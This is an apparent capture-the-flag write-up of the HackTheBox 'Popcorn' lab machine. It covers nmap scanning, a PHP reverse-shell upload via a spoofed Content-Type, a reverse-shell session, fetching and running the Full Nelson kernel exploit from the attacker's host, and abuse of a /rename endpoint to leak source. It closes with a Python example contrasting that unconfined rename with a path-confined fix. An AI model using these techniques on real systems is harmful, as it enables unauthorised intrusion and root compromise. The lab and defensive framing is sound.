```
# Nmap 7.80 scan initiated Mon Sep 30 20:55:45 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,80 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.30 (95%), Linux 2.6.32 (95%), Linux 2.6.35 (95%), Android 2.3.5 (Linux 2.6) (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Epson WF-2660 printer (94%), AVM FRITZ!Box FON WLAN 7240 WAP (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   219.17 ms 10.10.14.1
2   221.41 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 30 20:56:06 2019 -- 1 IP address (1 host up) scanned in 21.40 seconds
```
Only two ports are open, and we have no credentials for SSH, so the obvious choice is to go after the web server and enumerate every directory we can find. The interesting hits from the directory brute force:

```
/index      (Status: 200)   # Nothing juicy
/test       (Status: 200)   # PHP test page (phpinfo-style output)
/test.php   (Status: 200)   # PHP test page
/torrent    (Status: 301)   # PRIMARY FOCUS
/rename     (Status: 301)   # Cool, info-leak vector
```
So we focus on the torrent directory and see what we are working with.

We have the option to log in or sign up, so we'll sign up for an account to explore more vectors. After logging in we have the capability to upload a torrent file.
However, I was having trouble getting a new torrent file to upload, so I downloaded the torrent file already on the website, modified it using the following two tools, verified that everything was fine, and was then able to upload it.

After a successful upload, I have the option to edit the torrent and add a screenshot to the description. This is the vector I exploited to get RCE.
To bypass the upload filter, all you have to do is intercept the request with Burp and change the Content-Type of the file part to any image MIME type. I chose image/png and my PHP shell was uploaded successfully. The filter only looks at the Content-Type the client declares, which the attacker fully controls; it never checks the file extension or the actual bytes, so a .php file labelled image/png sails through.

Once the shell is uploaded, browse to /torrent/upload/, look for the file with a .php extension, and request it to trigger the reverse shell.
```
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.6] 50548
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 20:15:47 up 5 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

```
$ cd /home
$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Mar 17  2017 .
drwxr-xr-x 21 root   root   4096 Sep 30 18:58 ..
drwxr-xr-x  3 george george 4096 Mar 17  2017 george
$ cd george
$ ls -la
total 872
drwxr-xr-x 3 george george   4096 Mar 17  2017 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
-rw------- 1 root   root     2769 May  5  2017 .bash_history
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw------- 1 root   root     1571 Mar 17  2017 .mysql_history
-rw------- 1 root   root       19 May  5  2017 .nano_history
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Mar 17  2017 user.txt
$ cat user.txt
5e36a***
```
I ran the Linux Smart Enumeration scripts and tried some manual enumeration as well, but there was nothing left to do except exploit the kernel itself, as the box was running a pretty old Ubuntu 9.10. So I went with Full Nelson. (The commands appear twice in the output below because the shell has no tty, so stdin is echoed back.)

```
www-data@popcorn:/tmp$ wget http://10.10.14.10/fn.c
wget http://10.10.14.10/fn.c
--2019-09-30 20:23:57--  http://10.10.14.10/fn.c
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `fn.c'

100%[======================================>] 9,487       40.1K/s   in 0.2s

2019-09-30 20:23:57 (40.1 KB/s) - `fn.c' saved [9487/9487]

www-data@popcorn:/tmp$ gcc fn.c -o fn
gcc fn.c -o fn
www-data@popcorn:/tmp$ ./fn
./fn
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf840a280
[+] Resolved econet_ops to 0xf840a360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
id
uid=0(root) gid=0(root)
# cat /root/root.txt
cat /root/root.txt
f1223***
#
```
Kernel exploits are not pretty at all; they are very unstable and make life difficult. I had to reset the box 2-3 times before I got a working kernel exploit that popped the shell. So refrain from them as much as possible.
Another cool thing I came across was the /rename page, which had some very interesting output. I saw no other writeup mention this; I am not sure why, but this vector potentially exposes the whole /torrent application and makes bypassing it very easy.

Using this API we can leak the entire source code of /torrent, or of any other file for that matter, because it takes both the source and destination paths straight from the query string and renames whatever the www-data user can write:
```
# Request
http://10.10.10.6/rename/index.php?filename=/var/www/torrent/index.php&newfilename=/var/www/test.txt
# Check out test.txt and we'll have the index.php source code.
```

Renaming the file to a .txt extension matters: Apache no longer hands it to the PHP module, so it serves the raw source instead of executing it. And once the index file is moved out of the torrent folder, the whole folder becomes one big directory listing, and you can repeat the same trick to get the source of every file in it.

Do note, however, that you must reverse each rename by swapping the two parameters after use. If you don't, you'll have moved the files out, the application will stop working, and your only option will be to reset the box to get it working again.
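The root cause of the /rename leak and the fix a practitioner would want, as an added example that is not from this writeup or from the torrent hoster's code: a hypothetical model of the endpoint that renames whatever two paths the request supplies, beside a hardened version that resolves both paths and refuses anything outside a fixed base directory. It runs against a constructed temporary copy of the /var/www layout, so nothing on a real host is touched; the function names and the upload-directory layout are assumptions made for the example.

```python
"""
Added example (not part of the original writeup or the torrent hoster's code):
unconfined rename (the /rename behaviour observed above) beside a rename that
confines both source and destination to one directory.
"""
import os
import tempfile


def make_fake_webroot():
    """Constructed layout: <tmp>/torrent/index.php and <tmp>/torrent/upload/."""
    root = tempfile.mkdtemp(prefix="www-")
    os.makedirs(os.path.join(root, "torrent", "upload"))
    with open(os.path.join(root, "torrent", "index.php"), "w") as f:
        f.write("<?php /* application source */ ?>")
    return root


def vulnerable_rename(filename, newfilename):
    """Hypothetical model of the observed endpoint: both paths come straight
    from the query string, so any file the web server user can write on
    can be moved, including the application's own source."""
    os.rename(filename, newfilename)
    return True


def hardened_rename(base_dir, filename, newfilename):
    """Resolves both paths relative to base_dir and refuses anything that
    ends up outside it. realpath follows symlinks, so a link pointing out
    of the directory is caught as well; an absolute path passed as filename
    survives os.path.join unchanged and is rejected the same way."""
    base = os.path.realpath(base_dir)
    src = os.path.realpath(os.path.join(base, filename))
    dst = os.path.realpath(os.path.join(base, newfilename))
    for p in (src, dst):
        if os.path.commonpath([base, p]) != base:
            return False
    if not os.path.isfile(src):
        return False
    os.rename(src, dst)
    return True


def demo():
    """Returns (source leaked by the vulnerable rename,
    traversal rejected by the hardened rename with index.php intact,
    legitimate in-directory rename still works)."""
    root = make_fake_webroot()
    index = os.path.join(root, "torrent", "index.php")
    leak = os.path.join(root, "test.txt")

    moved = (vulnerable_rename(index, leak)
             and os.path.exists(leak) and not os.path.exists(index))
    vulnerable_rename(leak, index)          # put it back, as the writeup warns

    upload_dir = os.path.join(root, "torrent", "upload")
    rejected = not hardened_rename(upload_dir, "../index.php", "../../test.txt")
    still_there = os.path.isfile(index)

    with open(os.path.join(upload_dir, "a.torrent"), "w") as f:
        f.write("d8:announce0:e")           # constructed placeholder content
    legit_ok = (hardened_rename(upload_dir, "a.torrent", "b.torrent")
                and os.path.isfile(os.path.join(upload_dir, "b.torrent")))
    return moved, rejected and still_there, legit_ok


if __name__ == "__main__":
    print(demo())
```

The containment check is the minimum; a tighter design never accepts a filesystem path from the client at all and instead maps an opaque upload id to a server-chosen filename, which removes the whole class of traversal and absolute-path bugs.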